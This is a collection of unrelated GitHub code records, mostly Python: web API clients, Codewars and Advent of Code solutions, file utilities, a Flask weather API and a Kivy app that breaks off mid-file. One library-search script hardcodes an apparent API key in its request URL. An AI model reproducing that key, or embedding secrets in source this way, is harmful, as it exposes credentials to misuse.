+{"seq_id":"18796432310","text":"import requests\n#这个包不用逆向\nurl = \"https://fanyi.baidu.com/sug\"\nheaders = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36\",\n\n}\ndata = {\n \"kw\": \"dog\"\n}\nresp = requests.post(url, headers=headers, data=data)\nprint(resp.text)","repo_name":"konatax/crawler","sub_path":"百度翻译/ttt.py","file_name":"ttt.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"1180787147","text":"import zipfile\n\n\ndef unzip(archive):\n zip_file = zipfile.ZipFile(archive, 'r')\n for i_file in zip_file.namelist():\n zip_file.extract(i_file)\n zip_file.close()\n\n\ndef stats(name_file):\n result = {}\n if name_file.endswith('zip'):\n unzip(name_file)\n name_file = ''.join((name_file[:-3], 'txt'))\n file_txt = open(name_file, 'r', encoding='utf-8')\n for i_line in file_txt:\n for i_sym in i_line:\n if i_sym.isalpha():\n if i_sym not in result:\n result[i_sym] = 0\n result[i_sym] += 1\n file_txt.close()\n return result\n\n\nfile = 'voyna-i-mir.zip'\nstats_dict = stats(file)\nstats_sort = sorted(stats_dict.items(), key=lambda x: x[1], reverse=True)\nfor nun, letter in stats_sort:\n print(f\"Буква '{nun}' в тексте, встречается {letter} раз\")\n\n# зачет!\n","repo_name":"Mihalich2981/Python","sub_path":"Module22/09_war_and_peace/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"656917648","text":"import re\nimport numpy as np\nimport itertools\n\nstr_in = 'Stop gninnipS My sdroW!'\n\n\ndef spin_str(str_in):\n res = ''\n for match in re.finditer('\\w+|\\W+', str_in):\n sym = match.group(0)\n res += sym[::-1] if len(sym) >= 5 else sym\n\n return res\n\n\ndef decode_morse(morse_code):\n # Remember - you can use the preloaded MORSE_CODE dictionary:\n # For example:\n # MORSE_CODE['.-'] = 'A'\n # MORSE_CODE['--...'] = '7'\n # MORSE_CODE['...-..-'] = '$'\n\n MORSE_CODE_DICT = {'A': '.-', 'B': '-...',\n 'C': '-.-.', 'D': '-..', 'E': '.',\n 'F': '..-.', 'G': '--.', 'H': '....',\n 'I': '..', 'J': '.---', 'K': '-.-',\n 'L': '.-..', 'M': '--', 'N': '-.',\n 'O': '---', 'P': '.--.', 'Q': '--.-',\n 'R': '.-.', 'S': '...', 'T': '-',\n 'U': '..-', 'V': '...-', 'W': '.--',\n 'X': '-..-', 'Y': '-.--', 'Z': '--..',\n '1': '.----', '2': '..---', '3': '...--',\n '4': '....-', '5': '.....', '6': '-....',\n '7': '--...', '8': '---..', '9': '----.',\n '0': '-----', ',': '--..--', '.': '.-.-.-',\n '?': '..--..', '/': '-..-.', '-': '-....-',\n '(': '-.--.', ')': '-.--.-', '$': '...-..-',\n '&': '.-...', ':': '---...',\n 'SOS': '...---...', '!': '-.-.--', '+': '.-.-.',\n '\"': '.-..-.', '_': '..--.-', '\\'': '.----.',\n ';': '-.-.-.', '=': '-...-', '@': '.--.-.', '¿': '..-.-',\n '¡': '--...-'\n }\n\n Reverse_MORSE_CODE_DICT = {value: key for key, value in MORSE_CODE_DICT.items()}\n\n morse_code = morse_code.strip()\n words_list = [word.split(\" \") for word in morse_code.split(\" \")]\n\n words_list = [[Reverse_MORSE_CODE_DICT[sym] for sym in word] for word in words_list]\n res = ''\n for word in words_list:\n res += \"\".join(word) + \" \"\n\n # return ' '.join(''.join(MORSE_CODE[letter] for letter in word.split(' ')) for word in morseCode.strip().split(' '))\n return res.strip()\n\n\ndef swap_el(pointer):\n if pointer.next != None:\n if pointer.data > pointer.next.data:\n temp = pointer.next.data\n pointer.next.data = pointer.data\n pointer.data = temp\n if pointer.next.next != None:\n swap_el(pointer.next)\n\n\nclass WordDictionary:\n def __init__(self):\n self.dict_words = {}\n\n def add_word(self, word):\n self.dict_words[word.lower()] = word\n\n def __deep_search(self, word):\n template = re.compile(word)\n for word in self.dict_words.values():\n if re.fullmatch(template, word):\n return True\n return False\n\n def search(self, word):\n return True if self.dict_words.get(word.lower()) else self.__deep_search(word.lower())\n\n\ndef user_contacts(data):\n dict = {}\n for item in data:\n dict.setdefault(item[0], item[1]) if len(item) > 1 else dict.setdefault(item[0], None)\n\n return dict\n\n\ndef user_contacts_best(data):\n return {contact[0]: contact[1] if len(contact) > 1 else None\n for contact in data}\n\n\nfrom itertools import zip_longest\n\n\ndef user_contacts_zip(data):\n print(*data)\n print(data)\n return dict(zip(*zip_longest(*data)))\n\n\ndef transpose_list(list_of_lists):\n print('list', list_of_lists)\n print('*list', *list_of_lists)\n print('zip*list', list(zip(*list_of_lists)))\n return [\n list(row)\n for row in zip(*list_of_lists)\n ]\n\n\n# >>> date_info = {'year': \"2020\", 'month': \"01\", 'day': \"01\"}\n# >>> track_info = {'artist': \"Beethoven\", 'title': 'Symphony No 5'}\n# >>> filename = \"{year}-{month}-{day}-{artist}-{title}.txt\".format(\n# ... **date_info,\n# ... **track_info,\n# ... )\n# >>> filename\n# '2020-01-01-Beethoven-Symphony No 5.txt'\n\ndef get_multiple(*keys, dictionary, default=None):\n return [\n dictionary.get(key, default)\n for key in keys\n ]\n\n\ndef test(dict):\n print(**dict)\n\n\n# create_phone_number([1, 2, 3, 4, 5, 6, 7, 8, 9, 0]) # => returns \"(123) 456-7890\"\ndef create_phone_number(n):\n return '({0}{1}{2}) {3}{4}{5}-{6}{7}{8}{9}'.format(*n)\n\n\n# There are two lists, possibly of different lengths.\n# The first one consists of keys, the second one consists of values.\n# Write a function createDict(keys, values) that returns a dictionary created from keys and values.\n# If there are not enough values, the rest of keys should have a None (JS null)value.\n# If there not enough keys, just ignore the rest of values.\n\ndef createDict(keys, values):\n result_dict = dict(zip_longest(keys, values))\n if result_dict.get(None, False):\n del result_dict[None]\n return result_dict\n\ndef createDict_alt(keys, values):\n return dict(zip(keys, values + [None]*(len(keys) - len(values))))\n#########################\n\n# Python dictionaries are inherently unsorted.\n# So what do you do if you need to sort the contents of a dictionary?\n# Create a function that returns a sorted list of (key, value) tuples\n# (Javascript: arrays of 2 items).\n# The list must be sorted by the value and be sorted largest to smallest.\ndef sort_dict(d):\n return sorted(d.items(),key=lambda x:x[1],reverse=True)\n\n# In this kata, you will take the keys and values of a dict and swap them around.\n# You will be given a dictionary, and then you will want to return a dictionary with the old values as the keys, and list the old keys as values under their original keys.\n# For example, given the dictionary: {'Ice': 'Cream', 'Age': '21', 'Light': 'Cream', 'Double': 'Cream'},\n# you should return: {'Cream': ['Ice', 'Double', 'Light'], '21': ['Age']}\n\ndef switch_dict(dic):\n res={}\n [res.setdefault(value,[]).append(key) for key, value in dic.items()]\n return res\n\n\ndef chain(init_val, functions):\n print(init_val, functions)\n if len(functions) == 0:\n print('init_val=', init_val)\n return init_val\n else:\n return chain(functions[0](init_val), functions[1:])\n\ndef add10(x): return x + 10\ndef mul30(x): return x * 30\n\n# Write a function that when given a URL as a string, parses out just the domain name and returns it as a string.\n# For example:\n# * url = \"http://github.com/carbonfive/raygun\" -> domain name = \"github\"\n# * url = \"http://www.zombie-bites.com\" -> domain name = \"zombie-bites\"\n# * url = \"https://www.cnet.com\" -> domain name = cnet\"\n\n\n\n\n\n\ndef domain_name(url):\n\n #match=re.search('\\w+://(\\S+?)\\.|www\\.(\\S+?)\\.',url)\n match = re.search('(?:http://|https://){0,1}(?:www\\.{0,1}){0,1}(\\S+?)\\.{1}', url )\n\n return (match[1]) if match[1] else ( match[2] if match[2] else None)\n\ndef solution(roman):\n roman_dict={'I':1,\n 'V':5,\n 'X':10,\n 'L':50,\n 'C':100,\n 'D':500,\n 'M':1000\n }\n roman_list= np.array([roman_dict[symb] for symb in roman])\n roman_list_shift=np.append(roman_list[1:],0)\n is_bigger=roman_list>=roman_list_shift\n is_smaller=roman_list<roman_list_shift\n return roman_list[is_bigger].sum()-roman_list[is_smaller].sum()\n\n# https://www.codewars.com/kata/54521e9ec8e60bc4de000d6c/train/python\ndef max_sequence_non_opt(arr):\n arr=np.array(arr)\n max_sub_list=np.array([])\n max_sum=0\n for f in range(len(arr)+1):\n for i in range(f,len(arr)+1):\n sub_list=arr[f:i]\n\n cur_sum=np.sum(sub_list)\n if cur_sum>max_sum:\n max_sum=cur_sum\n max_sub_list=sub_list\n\n\n return max_sub_list, max_sum\n\ndef max_sequence_opt(arr):\n # алгоритм Алгоритм Кадане (динамическое программирование)\n arr=np.array(arr)\n zero=np.array([0]*len(arr))\n flag=np.sum(arr>zero)\n print(arr)\n if len(arr) > 1 and flag:\n local_sum = 0\n global_sum = 0\n for i in arr:\n local_sum = max(i, local_sum + i)\n global_sum = max(global_sum, local_sum)\n else:\n global_sum = 0\n return global_sum\n\ndef max_sequence_opt_refact(arr):\n #https: // math4everyone.info / blog / 2020 / 12 / 29 / poisk - maksimalnoj - summy - posledovatelnyh - elementov - massiva - algoritm - kadane - dinamicheskoe - programmirovanie /\n\n local_sum = 0\n global_sum = 0\n for i in arr:\n local_sum = max(i, local_sum + i)\n global_sum = max(global_sum, local_sum)\n\n return global_sum\n\ndef max_sequence(arr):\n print(arr)\n arr = np.array(arr)\n max_sub_list = np.array([])\n if len(arr):\n max_sum = np.array(arr).sum()\n else:\n return 0\n print('max_sum', max_sum)\n\n min_index=np.argmin(arr)\n print('min index=',min_index, 'min val', arr[min_index])\n if np.array(arr[:min_index]).sum() > max_sum or np.array(arr[min_index+1:]).sum() > max_sum:\n print('left max',arr[:min_index].sum())\n print('right max',arr[min_index+1:].sum() )\n left_sum=arr[:min_index].sum()\n right_sum=arr[min_index+1:].sum()\n\n if left_sum > max_sum and left_sum < arr[min_index] and left_sum>right_sum:\n return max_sequence(arr[:min_index])\n else:\n if right_sum > max_sum and right_sum.sum()< arr[min_index] and left_sum<right_sum:\n return max_sequence(arr[min_index+1:])\n else:\n return max_sequence_non_opt(arr)\n\n\n else:\n return max_sequence_non_opt(arr)\n\n\n\n#https://www.codewars.com/kata/5526fc09a1bbd946250002dc/train/python\n\ndef my_print(func):\n def wrappedFunc(arg):\n res=func(arg)\n print('res=',res)\n return res\n return wrappedFunc\n\n@my_print\ndef find_outlier(integers):\n integers = np.array(integers)\n odds = np.array([2] * len(integers))\n check=integers%odds\n return int(integers[check==1]) if check.sum() == 1 else int(integers[check==0])\n\n\n\n@my_print\ndef foo():\n pass\n\n# прохід матриці по равлику поворот матриці\n\ndef snail(arr):\n\n if type(arr)!=type(np.array([])):\n arr=np.array(arr)\n\n def __snail_out(arr):\n res=[]\n if len(arr[0])>1:\n\n res=res+list(arr[0,0:-1])+list(arr[:,-1])\n arr=arr[1:, 0:-1]\n arr=np.array(list(zip(*arr))[::-1])\n arr = np.array(list(zip(*arr))[::-1])\n return res+__snail_out(arr)\n\n else:\n\n res.append(arr[0,0])\n return res\n\n if np.shape(arr) == np.shape([[]]):\n return []\n else:\n return __snail_out(arr)\n\ndef snail(array):\n m = []\n array = np.array(array)\n while len(array) > 0:\n m += array[0].tolist()\n array = np.rot90(array[1:])\n return m\n\nif __name__ == '__main__':\n # data = [[\"Grae Drake\", 98110], [\"Bethany Kok\"], [\"Alex Nussbacher\", 94101], [\"Darrell Silver\", 11201]]\n # print(user_contacts_zip(data))\n # print(transpose_list([[1, 4, 7], [2, 5, 8], [3, 6, 9]]))\n #\n # fruits = {'lemon': [1,2,3], 'orange': 'orange', 'tomato': 'red'}\n # fruits_1 = {'lemon': [1, 4], 'orange': [2], 'tomato': 'red'}\n # #get_multiple('lemon', 'tomato', 'squash', dictionary=fruits, default='unknown')\n # #test(fruits)\n #\n # print('dict=', data)\n # print('*dict=', *data)\n #\n # print('dict=', list(zip_longest(*data)))\n # print('dict=', dict(zip(*zip_longest(*data))))\n # num=[1, 2, 3, 4, 5, 6, 7, 8, 9, 0] # => returns \"(123) 456-7890\"\n # print(create_phone_number(num))\n # dict_in={'Ice': 'Cream', 'Age': '21', 'Light': 'Cream', 'Double': 'Cream'}\n # print(switch_dict(dict_in))\n # print(dict_in)\n\n #print(chain(50, [mul30]))\n\n # url = \"www.xakep.ru\"\n # print(domain_name(url))\n # url = \"https://google.com\"\n # print(domain_name(url))\n #\n # url = \"http: // google.co.jp\"\n # print(domain_name(url))\n # print(solution('XXI'))\n #arr=[160, 3, 1719, 19, 11, 13, -21]\n #find_outlier(arr)\n arr = [[1, 2, 3, 4],\n [5, 6, 7, 8],\n [9, 10, 11, 12],\n [13, 14, 15, 16]]\n print(snail([[]]))\n\n\n\n\n","repo_name":"dav-pr/codewars","sub_path":"codewars.py","file_name":"codewars.py","file_ext":"py","file_size_in_byte":12229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33575634008","text":"import urllib.request\nimport urllib\nfrom xml.dom.minidom import parse, parseString\n'''save_data_list = [\"SIGUN_NM\", \"LIBRRY_NM\", \"CLOSE_DE_INFO\", \"OPERT_BEGIN_TM\", \"OPERT_END_TM\",\n \"LIBRRY_TELNO\", \"REFINE_ROADNM_ADDR\", \"REFINE_WGS84_LOGT\", \"REFINE_WGS84_LAT\",\n \"TMP01\", \"TMP02\", \"TMP03\", \"TEMP\", \"BOOK_DATA_CNT\"]\nrename_data_list = [\"SIGUN_NM\", \"LIBRRY_NM\", \"CLOSE_DE_INFO\", \"BEGIN_TM\", \"END_TM\",\n \"LIBRRY_TELNO\", \"ADDRESS\", \"LONGI\", \"LAT\",\n \"SAT_BEGIN_TM\", \"SAT_END_TM\", \"HOLI_BEGIN_TM\", \"HOLI_END_TM\", \"BOOK_NUM\"]'''\n\nsave_data_dict = {'SIGUN_NM': 'SIGUN_NM', 'LIBRRY_NM': 'LIBRRY_NM',\n 'CLOSE_DE_INFO': 'CLOSE_DE_INFO', 'OPERT_BEGIN_TM': 'BEGIN_TM',\n 'OPERT_END_TM': 'END_TM', 'LIBRRY_TELNO': 'LIBRRY_TELNO',\n 'REFINE_ROADNM_ADDR': 'ROAD_ADDRESS', 'REFINE_WGS84_LOGT': 'LONGI',\n 'REFINE_WGS84_LAT': 'LAT', 'TMP01': 'SAT_BEGIN_TM', 'TMP02': 'SAT_END_TM',\n 'TMP03': 'HOLI_BEGIN_TM', 'TEMP': 'HOLI_END_TM', 'BOOK_DATA_CNT': 'BOOK_NUM', \"REFINE_LOTNO_ADDR\" : \"ADDRESS\"}\n\n\nlibrary_list = []\nlocal_library_list = []\n\ndef search_name_and_register(name):\n global library_list\n library_list = search_name(name)\n return\n\n\ndef search_name(name, lib_list=None):\n if lib_list is None:\n lib_list = local_library_list\n result = []\n for lib in lib_list:\n if lib[\"LIBRRY_NM\"].find(name) != -1:\n result.append(lib)\n elif lib[\"ADDRESS\"].find(name) != -1:\n result.append(lib)\n elif lib[\"ROAD_ADDRESS\"].find(name) != -1:\n result.append(lib)\n return result\n\n\ndef search_and_register(to_search):\n global library_list, local_library_list\n local_library_list = library_list = search(to_search)\n\ndef search(to_search):\n #검색\n sigun = urllib.parse.quote(to_search)\n key = '961adfdf5c574548bf2e9352dde74c19'\n url = \"https://openapi.gg.go.kr/Library?\" + \"KEY=\" + key + \"&SIGUN_NM=\" + sigun\n req = urllib.request.Request(url)\n resp = urllib.request.urlopen(req)\n docs = parseString(resp.read().decode('utf-8'))\n\n #저장\n lib_list = []\n library = docs.childNodes[0].childNodes\n # head = library[1].childNodes\n # num_of_library = head[1].childNodes[0].nodeValue\n for row in library:\n if row.nodeName == \"row\":\n library_data = {}\n for comp in row.childNodes:\n if comp.nodeName in save_data_dict.keys():\n library_data[save_data_dict[comp.nodeName]] = comp.childNodes[0].nodeValue\n lib_list.append(library_data)\n return lib_list\n\n\n\n\n\n\n\n\n","repo_name":"kimrugi/2021-script-term_project","sub_path":"load_xml.py","file_name":"load_xml.py","file_ext":"py","file_size_in_byte":2666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38062147748","text":"from pathlib import Path\n\nMAX_CHUNK_SIZE = 4096\nPROJECT_DIR = Path(__file__).parent.resolve()\n\n\ndef create_project_dir(name):\n project_dir = Path(name).resolve()\n if project_dir.exists():\n print(f\"Path {project_dir} already exists.\")\n project_dir = None\n else:\n project_dir.mkdir()\n\n return project_dir\n\n\ndef copy_targets(copy_list):\n for src, dst in copy_list:\n copy_target(src, dst)\n\n\ndef copy_target(src, dst):\n if dst.exists() and not is_content_equal(src, dst):\n print(\n f\"File {dst} already exists and is different from the template. \"\n \"Overwrite (o), merge (m) or skip (s)?\"\n )\n while True:\n value = input(\"(o/m/s) [o]: \")\n if value == \"o\" or value == \"\":\n dst.unlink()\n copy_file(src, dst)\n elif value == \"m\":\n merge_file(src, dst)\n elif value == \"s\":\n print(f\"Skipping {dst}\")\n else:\n continue\n break\n else:\n copy_file(src, dst)\n\n\ndef copy_file(f_src, f_dst):\n if not f_dst.parent.exists():\n f_dst.parent.mkdir(parents=True)\n with open(f_src, \"rb\") as src, open(f_dst, \"wb\") as dst:\n dst.write(src.read())\n\n\ndef merge_file(f_src, f_dst):\n with open(f_src, \"r\") as src, open(f_dst, \"r+\") as dst:\n src_lines = src.readlines()\n dst_lines = dst.readlines()\n dst_lines += [\n line\n for line in src_lines\n if line not in dst_lines and line.strip() != \"\"\n ]\n dst.seek(0)\n dst.writelines(dst_lines)\n\n\ndef write_file(f_dst, text):\n if f_dst.exists():\n value = input(\n f\"File {f_dst} already exists. Overwrite (o) or skip (s)? [o]: \"\n )\n if value != \"o\" and value != \"\":\n return\n f_dst.parent.mkdir(parents=True, exist_ok=True)\n with open(f_dst, \"w\") as dst:\n dst.write(text)\n\n\ndef is_content_equal(f1, f2):\n with open(f1, \"rb\") as f1, open(f2, \"rb\") as f2:\n while True:\n chunk1 = f1.read(MAX_CHUNK_SIZE)\n chunk2 = f2.read(MAX_CHUNK_SIZE)\n if chunk1 != chunk2:\n return False\n if not chunk1:\n break\n return True\n","repo_name":"hughplay/dockerlab","sub_path":"dockerlab/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"2320394817","text":"import matplotlib.pyplot as pt\n\nfrom pulse_lib.tests.hw_schedule_mock import HardwareScheduleMock\nimport pulse_lib.segments.utility.looping as lp\n\nfrom configuration.small import init_hardware, init_pulselib\nfrom utils.plot import plot_awgs\n\n\n# create \"AWG1\"\nawgs, digs = init_hardware()\n\n# create channels P1, P2\np = init_pulselib(awgs, digs)\n\nt_measure_loop = lp.linspace(100,800,8,name=\"t_measure\",unit=\"ns\",axis=0)\nv_param = lp.linspace(20,240,12,name=\"vP1\",unit=\"mV\",axis=1)\nt_wait = 100\n\n\nseg1 = p.mk_segment()\nseg2 = p.mk_segment()\n\nseg1.P1.add_ramp_ss(0, 100, 0, v_param)\nseg1.P1.add_block(100, 200, v_param)\n\nseg2.P2.add_block(0, 100, 200)\nseg2.P2.wait(t_wait)\nseg2.reset_time()\nseg2.SD1.acquire(50, t_measure=t_measure_loop)\nseg2.SD2.acquire(50, t_measure=t_measure_loop) # @@@ test multiple channels with Keysight\nseg2.wait(t_measure_loop)\n#seg2.add_HVI_marker('dig_trigger_1', t_off=50)\nseg2.P1.add_block(0, 100, v_param)\n#seg2.add_HVI_variable('t_measure', t_measure_loop)\n\n# create sequence\nseq = p.mk_sequence([seg2])\nseq.set_hw_schedule(HardwareScheduleMock())\nseq.n_rep = 3\n\nprint('Shape', seq.shape)\nprint(seq.setpoints)\nprint(seq.labels)\n\n\nfor index in ([(0,0), (11,1)]):\n seq.upload(index=index)\n seq.play(index=index)\n\npt.figure()\npt.title('segment 1')\nseg1.plot((0,5))\n\nfor index in [(0,0), (0,2), (8,0)]:\n pt.figure()\n pt.title(f'segment 2 - {index}')\n seg2.plot(index=index)\n\n\nplot_awgs(awgs)\npt.title('AWG upload with DC compensation pulse at end')\n","repo_name":"stephanlphilips/pulse_lib","sub_path":"pulse_lib/examples/example_t_measure_sweep.py","file_name":"example_t_measure_sweep.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"38533268970","text":"from django.contrib import admin\nfrom django.urls import path\nfrom app import views\n\nurlpatterns = [\n path(\"\",views.home, name='homepage'),\n path('menu/<int:pk>',views.menu,name='menu'),\n path('signup/',views.Signup.as_view(),name='signup'),\n path('login/',views.Login.as_view(),name='login'),\n path('logout/',views.logout),\n path('cart/<int:pk>',views.Cart.as_view()),\n \n\n]","repo_name":"abhishek740/FoodOrderAppInDjango","sub_path":"app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38164887076","text":"import logging\r\nimport os\r\n\r\nimport hashlib\r\n\r\nfrom collections import deque\r\nfrom grid_system import XY\r\n\r\nscript_dir = os.path.dirname(__file__)\r\nscript_name = os.path.splitext(os.path.basename(__file__))[0]\r\n\r\nlog_file = os.path.join(script_dir, f\"logs/{script_name}.log\")\r\nlogging.basicConfig(level=logging.WARNING, filename=log_file, filemode='w',)\r\n\r\npasscode = \"rrrbmfta\"\r\n\r\ndirections = {\r\n \"U\" : XY(0, -1),\r\n \"D\" : XY(0, +1),\r\n \"L\" : XY(-1, 0),\r\n \"R\" : XY(+1, 0),\r\n}\r\n\r\ndef connected_nodes(node, path_to_here):\r\n connected_nodes = {}\r\n hash_value = hashlib.md5(f\"{passcode}{path_to_here}\".encode()).hexdigest()\r\n for i, d in enumerate(\"UDLR\"):\r\n if hash_value[i] in \"bcdef\":\r\n n = node + directions[d]\r\n if n.x in range(4) and n.y in range(4):\r\n connected_nodes[d] = n\r\n return connected_nodes\r\n\r\ndef bfs_path(start=XY(0, 0), goal=XY(3, 3), find_shortest=True):\r\n path_to_goal = None\r\n # Still need to visit (point, via path)\r\n to_visit = deque([(start, \"\")])\r\n while to_visit:\r\n this_node, path_so_far = to_visit.popleft()\r\n for d, next_node in connected_nodes(this_node, path_so_far).items():\r\n if next_node == goal:\r\n path_to_goal = path_so_far + d\r\n if find_shortest:\r\n return path_to_goal\r\n else:\r\n to_visit.append((next_node, path_so_far + d))\r\n return path_to_goal\r\n\r\nstart=XY(0, 0)\r\ngoal=XY(3, 3)\r\nprint(f\"Part 1: {bfs_path(start, goal)}\")\r\nprint(f\"Part 2: {len(bfs_path(start, goal, False))}\")","repo_name":"gid/AoC","sub_path":"Archive/2016/day_17.py","file_name":"day_17.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32193121889","text":"#!/usr/bin/python\n\n# tabprint.py -- Print a tab-delimited text file into a fixed width format for easy viewing/printing. \n# Used in conjunction with tabview.py, which provides no printing facilities or ability to\n# deal with pipes.\n\n# Example usage\n# cat foo.txt | tabprint.py | less -S\n# tabprint.py foo.txt bar.txt | less -S\n# tabprint.py foo.txt bar.txt > foobar.txt; tabview.py foobar.txt\n\nimport os, sys, re, string, tabview, fileinput #we don't currently use the tabview library, but one could imagine better integration here\nCOLUMN_WIDTH = 20\npadstr = \"\".join([\" \" for nn in range(0,COLUMN_WIDTH+1)]) #make a blank string for padding\n\n\n#0) Get the input from either stdin or all input streams\nif len(sys.argv) == 1:\n fh = sys.stdin\nelse:\n fh = fileinput.input() #See http://docs.python.org/lib/module-fileinput.html\n\n#1) Iterate over that input and write it in a fixed width format to stdout\ndef cropstring(xx):\n xlen = len(xx)\n if(xlen > COLUMN_WIDTH):\n return(xx[0:COLUMN_WIDTH]) #crop\n else:\n return(xx + padstr[0:(COLUMN_WIDTH-xlen)]) #pad\n\nfor line in fh:\n toks = line.rstrip(\"\\n\").split(\"\\t\")\n try:\n sys.stdout.write(\"\\t\".join([cropstring(xx) for xx in toks]) + \"\\n\")\n except:\n #If pipe is broken, end gracefully\n sys.exit()\n \n\n \n\n\n\n\n\n \n\n","repo_name":"dad/base","sub_path":"src/tabprint.py","file_name":"tabprint.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"8395676591","text":"#!/usr/bin/env python\nimport time\n\nimport wandb\nimport yea\n\n\ndef main():\n run = wandb.init()\n history = 20\n for i in range(history):\n if i % 10 == 0:\n print(i)\n run.log(dict(num=i))\n time.sleep(0.1)\n print(\"done\")\n run.finish()\n\n\nif __name__ == \"__main__\":\n yea.setup()\n main()\n","repo_name":"wandb/wandb","sub_path":"tests/standalone_tests/mitm_tests/mem_pressure.py","file_name":"mem_pressure.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":7479,"dataset":"github-code","pt":"37"} +{"seq_id":"26889830085","text":"# import dependencies\nimport numpy as np\nfrom datetime import datetime as dt\n\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\n\nfrom flask import Flask, jsonify\n\n######################################################### \n# Database Setup \n#########################################################\nengine = create_engine('sqlite:///Resources/hawaii.sqlite')\n\n# reflect an existing database into a new model\nBase = automap_base()\n\n# reflect the tables\nBase.prepare(engine, reflect=True)\n\n# Save references to each table\nMeasurement = Base.classes.measurement\nStation = Base.classes.station\n\n\n#########################################################\n# Flask App Setup\n#########################################################\nclimateApp = Flask(__name__)\n\n\n#########################################################\n# Flask Routes\n#########################################################\n\n# HOME ROUTE\n@climateApp.route(\"/\")\ndef home():\n print(\"Server received request for 'Home' page...\")\n \n # list available routes\n return (\n f\"Available routes:<br/>\"\n f\"<br/>\"\n f\"/api/v1.0/precipitation<br/>\"\n f\"<br/>\"\n f\"/api/v1.0/stations<br/>\"\n f\"<br/>\"\n f\"/api/v1.0/tobs<br/>\"\n f\"<br/>\"\n f\"/api/v1.0/startDate<br/>\"\n f\"- User must input date formatted as yyyymmdd in place of 'startDate'<br/>\"\n f\"<br/>\"\n f\"/api/v1.0/startDate/endDate<br/>\"\n f\"- User must input dates formatted as yyyymmdd in place of 'startDate' and 'endDate'\"\n )\n\n# PRECIPITATION ROUTE\n@climateApp.route(\"/api/v1.0/precipitation\")\ndef precipiation():\n # create session from python to database\n session = Session(engine)\n \n \"\"\"Return .json of dates and precipitation amounts\"\"\"\n # query all dates & precipitation amounts\n results = session.query(Measurement.date, Measurement.prcp).all()\n \n session.close()\n \n # create a dictionary from the row data and append it to a list\n precipByDate = []\n for date, prcp in results:\n precipDict = {}\n precipDict[\"Date\"] = date\n precipDict[\"Precipitation\"] = prcp\n precipByDate.append(precipDict)\n \n # return results as json\n return jsonify(precipByDate)\n\n# STATIONS ROUTE\n@climateApp.route(\"/api/v1.0/stations\")\ndef stations():\n # create session from python to database\n session = Session(engine)\n \n \"\"\"Return .json of stations\"\"\"\n # query all stations\n results = session.query(Station.station).all()\n \n session.close()\n \n # convert list of tuples into normal list\n allStations = list(np.ravel(results))\n \n # return results as json\n return jsonify(allStations)\n\n# START DATE ONLY ROUTE\n@climateApp.route(\"/api/v1.0/<startDate>\")\ndef startOnly(startDate):\n \"\"\"Fetch data on the min, max, and average temperature for all dates since startDate.\"\"\"\n\n # parse user input into datetime object\n parsedStart = dt.strptime(startDate, \"%Y%m%d\")\n \n # create session from python to database\n session = Session(engine)\n \n # create list of values to select\n sel = [func.min(Measurement.tobs),\n func.max(Measurement.tobs),\n func.avg(Measurement.tobs)]\n \n results = session.query(*sel).filter(Measurement.date >= parsedStart).all()\n \n session.close()\n \n # create a dictionary from the data and append it to a list\n startDateSummary = []\n for minTemp, maxTemp, avgTemp in results:\n tempDict = {}\n tempDict[\"Minimum Temperature\"] = minTemp\n tempDict[\"Maximum Temperature\"] = maxTemp\n tempDict[\"Average Temperature\"] = avgTemp\n startDateSummary.append(tempDict)\n \n return jsonify(startDateSummary)\n\n# START TO END DATE ROUTE\n@climateApp.route(\"/api/v1.0/<startDate>/<endDate>\")\ndef startToEnd(startDate, endDate):\n \"\"\"Fetch data on the min, max, and average temperature for all dates between startDate and endDate.\"\"\"\n\n # parse user input into datetime object\n parsedStart = dt.strptime(startDate, \"%Y%m%d\")\n parsedEnd = dt.strptime(endDate, \"%Y%m%d\")\n \n # create session from python to database\n session = Session(engine)\n \n # create list of values to select\n sel = [func.min(Measurement.tobs),\n func.max(Measurement.tobs),\n func.avg(Measurement.tobs)]\n \n results = session.query(*sel).filter(Measurement.date >= parsedStart).filter(Measurement.date <= parsedEnd).all()\n \n session.close()\n \n # create a dictionary from the data and append it to a list\n startToEndSummary = []\n for minTemp, maxTemp, avgTemp in results:\n tempDict = {}\n tempDict[\"Minimum Temperature\"] = minTemp\n tempDict[\"Maximum Temperature\"] = maxTemp\n tempDict[\"Average Temperature\"] = avgTemp\n startToEndSummary.append(tempDict)\n \n return jsonify(startToEndSummary)\n \n# code to run app\nif __name__ == \"__main__\":\n climateApp.run(debug = True)","repo_name":"spennyharrison/sqlalchemy-challenge","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37174342842","text":"from kivy.app import App\nfrom kivy.uix.screenmanager import ScreenManager, Screen\nfrom kivy.lang import Builder\nfrom kivy.core.clipboard import Clipboard\nimport time\n\nfrom filesharer import FileSharer\nimport webbrowser\n\nBuilder.load_file(\"frontend.kv\")\n\n\nclass CameraScreen(Screen): # This is called boilerplate 